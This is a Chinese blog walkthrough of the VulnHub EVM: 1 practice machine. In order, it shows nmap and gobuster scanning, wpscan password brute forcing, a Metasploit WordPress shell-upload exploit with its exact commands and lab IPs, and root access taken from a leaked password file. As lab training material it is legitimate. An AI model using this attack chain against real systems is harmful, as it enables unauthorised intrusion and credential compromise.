vulnhub EVM: 1

最新推荐文章于 2024-08-08 20:00:57 发布
最新推荐文章于 2024-08-08 20:00:57 发布
阅读量852 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: wordpress wpscan metasploit 安全 reverse shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/125668269
版权

渗透思路:

nmap扫描----gobuster扫描网站目录----wpscan枚举wordpress用户名并爆破密码----Metasploit获取靶机shell----找到记录root密码的文件并提权

环境信息:

靶机:192.168.101.80

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.80

扫描到tcp端口22(ssh)、53(dns)、80(http)、110和143(邮件相关)、139和445(smb相关)

2、gobuster扫描网站目录

先看80端口,用gobuster扫描网站目录,发现/wordpress目录

​gobuster dir -u http://192.168.101.80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

3、wpscan枚举wordpress用户并爆破密码

先用wpscan枚举wordpress用户

​wpscan --url http://192.168.101.80/wordpress/ -e

发现用户 c0rrupt3d_brain

再用wpscan爆破c0rrupt3d_brain的密码

​wpscan --url http://192.168.101.80/wordpress/ -U c0rrupt3d_brain -P rockyou.txt

发现一组用户名密码

| Username: c0rrupt3d_brain, Password: 24992499

4、Metasploit获取靶机shell

由于这个靶机的wordpress没法通过网页访问(加载不出来,一般做wordpress的靶机都要在hosts文件中增加靶机ip和主机名映射关系,但是这个靶机目前为止没有发现主机名相关的信息),因此我想在网上找找不用访问网站即可得到shell的方法。

在google上搜索wordpress shell exp,找到一篇包含多种通过wordpress获得反弹shell的文章,其中第四种方法使用Metasploit的exploit/unix/webapp/wp_admin_shell_upload,不需要用浏览器访问网站即可获得反弹shell

Wordpress Reverse Shell : Multiple Methods - Hackercool Magazine

首先在攻击机命令行中输入msfconsole进入msf控制台

然后选择exploit/unix/webapp/wp_admin_shell_upload模块并设置参数,最后输入exploit执行

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME c0rrupt3d_brain
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD 24992499
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.101.80
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

show options可以确认各参数的值

执行exploit后得到meterpreter shell,再输入shell可以得到靶机shell,从下图中可见,靶机当前用户是www-data

5、提权

靶机shell中输入如下命令获得交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

进入/home目录,发现文件夹root3r

进入/home/root3r,发现文件.root_password_ssh.txt

查看该文件内容,发现root的密码为willy26

执行su -命令,并输入root的密码willy26,获得root用户的shell。在/root文件夹下发现proof.txt

仙女象
关注
专栏目录
Vulhub系列:EVM 1
Ms08067安全实验室
11-29 536
0x00 技术点Nmap端口扫描、目录发现、漏洞探测Wpscan用户枚举、密码爆破Meterpreter shell权限提升0x01 环境搭建靶机链接: https://www.vuln...
vulnhub靶场之EVM
qq_34613171的博客
02-11 312
难度:初级 这是超级友好的盒子,适合初学者 使用VirtualBox可能比使用VMware更好 http://192.168.56.103/ 扫目录发现wordpress/。 使用wpscan进行扫描 wpscan --url http://192.168.0.119/wordpress/ -e at -e ap -e u wpscan枚举(-e)在wordpress网站上安装的所有主题(at...
oscp——EVM:1
王嘟嘟的博客
02-12 320
0x00 前言 这个是做的第30台机子了。难度很低,基本webshell拿到手就ok了 0x01 信息收集 0x02 端口 samba没找到什么内容 0x03 Web 访问为默认页面 进行目录遍历 找到一个wp的站 然后扫一下插件,以及用户 发现一个插件有EIF 但是没法拿到shell 爆破用户拿到账号密码 登录之后反弹shell 随便看一看。。。就拿到flag了。。。 0x0...
DIRB:一款强大的Web目录扫描工具使用指南
最新发布
xt350488的博客
08-08 1765
DIRB(DIR Browser)最初由Pablo Santos开发,自发布以来就因其简单、高效而受到欢迎。DIRB的工作原理是通过发送HTTP GET请求到服务器上的特定目录和文件,并分析响应来判断目录或文件是否存在。它支持多线程,可以快速扫描大量潜在的URL,并且可以自定义请求头和代理设置,增加了其灵活性和实用性。DIRB允许你自定义HTTP请求头,这在绕过某些简单的安全机制时非常有用。使用-H参数可以添加自定义请求头。
VulnHub系列』EVM: 1-Walkthrough
ins1ght的博客
11-28 701
靶机发布日期:2019年11月2日,难度:初级。这个靶机本身没有什么难度,容易卡住的地方也就是配置靶机的网络了。PS:以后的文章可能更加偏重于思路的分享,可能不再像以前一样写的那么细节,但这不代表以后都不用心了,只能说顺应大趋势吧,该提到的点也都会提到。有什么问题可以私下交流,感谢!!!
vulnhub - EVM
weixin_46164380的博客
03-27 215
EVM靶机 网段扫描:arp-scan -l 扫描靶机开启的服务 开启的服务比较多,有ssh服务、有http服务;还有三个邮件协议110、139、445; Ps:samba可以进行枚举 共享 enum4linux -S 192.168.56.103 遍历目录发现:info.php 并且还是wordpress框架 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ctK...
EVM: 1-Walkthrough【VulnHub靶场】渗透测试实战系列2
重新启程
12-03 567
靶场地址:EVM: 1 这个靶机比较特殊的地方,不是用dhcp生成地址,必须用host网络,靶机的地址必须为192.168.56.103。 至于怎么做到,小伙伴自行脑补,有助于手臂锻炼。呵呵! 搞定上面的准备工作之后,拿出kali,先扫一下地址和端口: 用enum4linux对smb扫描了一下,没有什么特别有用的信息 就直接打开80web看看情况,扫描了一下目录,发现有word...
vulnhub靶机EVM渗透笔记
liver100day的博客
08-02 1223
文章标题1.环境搭建2.信息收集2.1 主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:EVM IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/ 2.信息收集 2.1 主机发现 我们要进行渗透,首先得知道目标靶机的IP地址,否则将无从做起 arp-scan -l 3.漏洞利用 4.提权 5.总结 ...
vulnhub靶机之EVM
timesleep的博客
11-30 784
拿到我们的靶机我们首先扫描并确定靶机IP 发现这个靶机为153然后使用nmap扫描 看到靶机有80端口然后先访问一下 看到只是一个apache界面使用扫描一下目录 我们发现靶机有wordpress框架,然后使用wpscan工具扫描这个框架. wpscan --url http://192.168.34.153/wordpress -e ap -e at -e u 我们看到了一个用户c...
VulnHub 靶机学习No.1-EVM
gh0stf1re的博客
09-27 291
本篇博客的主要内容VulnHub 靶机学习No.1-EVM靶机运行说明信息收集反弹shell提权知识点总结:参考链接: VulnHub 靶机学习No.1-EVM 靶机运行说明 靶机难度: 目标: 攻击机:kali linux,ip地址:192.168.56.102 靶机:EVM,IP地址:192.168.56.103 信息收集 仅开启kali 和靶机,使用nmap扫描kali所在的C段 nmap 192.168.56.102/24 扫描结果: root@kali:~# nmap 192.168.56.
Vulnhub:EVM 1靶机
qq_43884092的博客
04-24 154
wpscan爆破用户名和密码,/home/root3r/.root_password_ssh.txt发现root用户的密码
vulnhub EVM 记录
qq_45826388的博客
09-20 167
Description This is super friendly box intended for Beginner's This may work better with VirtualBox than VMware 靶机ip:192.168.34.163 kali ip:192.168.34.153 端口扫描 目录爆破 发现/wordpress 使用spscan扫描 wpscan --url http://192.168.34.163/wordpress --enumerate u 暴力破
vulnhub渗透系列之EVM (内含许多疑问!!!)
来到了学渣的博客
01-28 1846
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.这个靶机做下来,的确是比较好入手比较简单,但不建议去做,因为一些网络配置的问题,的确 挺复杂的,不知道如何解决,但如果解决了这个问题,那这个靶机还是很不错的。(见未解决的疑问 2.首先还是探测存活的靶机和开放的端口,虽然开放了139、44...
最好的目录扫描工具dirsearch-master非常详细使用方法
热门推荐
yuanlirong22的专栏
09-23 1万+
dirsearch是一个扫描网站的目录和文件的命令行工具,并可以使用多线程快速扫描目标站点。它可以通过自定义字典进行扫描,同时支持正则表达式和自定义扩展名。这是目前个人觉得最好的目录扫描工具,不接受反驳,反驳就是你对。
网络安全——Web目录扫描
weixin_54055099的博客
09-01 4820
Web目录扫描
dirb网站目录扫描工具详解
有勇气的牛排博客
07-29 6251
1 介绍 有勇气的牛排 — 攻防 Kali Linux提供一款基于字典的Web目录扫描工具DIRB。该工具根据用户提供的字典,对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破,以发现更多的路径。同时,该工具支持代理、HTTP认证扫描限制访问的网站。该工具还提供两个命令,帮助用户从网页生成字典,或者生成定制字典。 1.1 什么是dirb DIRB 是一个基于命令行的工具,可以根据单词列表对任何目录进行暴力破解。 DIRB 会发出一个 HTTP 请求,并查看每个请求的 HTTP 响应代码 1.2 如何工作
最常用的web目录扫描工具
qq_43511094的博客
03-22 7659
本文主要记载kali中最常用的几个web目录扫描工具 文章目录dirbdirb是什么前言基本使用参数介绍小结dirsearchdirsearch是什么gobustergobuster是什么前言dir模式基本用法dir模式参数介绍小结总结 dirb dirb是什么 前言 dirb是一个基于字典的目录扫描工具,会采用递归的方式去获取更多的目录,支持代理,延迟访问和添加请求头。此工具在kali中自带。 基本使用 dirb是一个目录扫描工具,类似于御剑一样,所以对于大多数情况而言,如果对一个网站的语言不是很.
vulnhub Pwned: 1
箭雨镜屋
09-23 1604
渗透思路: nmap扫描端口 ---- gobuster扫描网站目录 ---- burp爆破网站目录 ---- 网站源代码泄露ftp用户名密码 ---- ariana用户用id_rsa进行ssh登录 ---- sudo bash脚本提权到selena ---- 利用docker越权查看文件
Burp Suite序列之目录扫描
xsq123的专栏
12-01 1959
通过以上五个步骤,我们就可以使用Burp Suite进行目录扫描了。Burp Suite不仅可以爆破账号密码,还可以用来爆破目录。使用Burp Suite进行目录扫描有以下优点:无需安装其他工具,只需打开Burp Suite即可无需手动输入网址和字典,只需在浏览器中访问目标网站即可无需切换工具,只需在Burp Suite中选择相应的模块即可可以与其他渗透测试工具协同工作,方便整合当然,Burp Suite也有一些缺点,比如说:需要付费才能使用完整功能需要一定的学习成本才能掌握。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值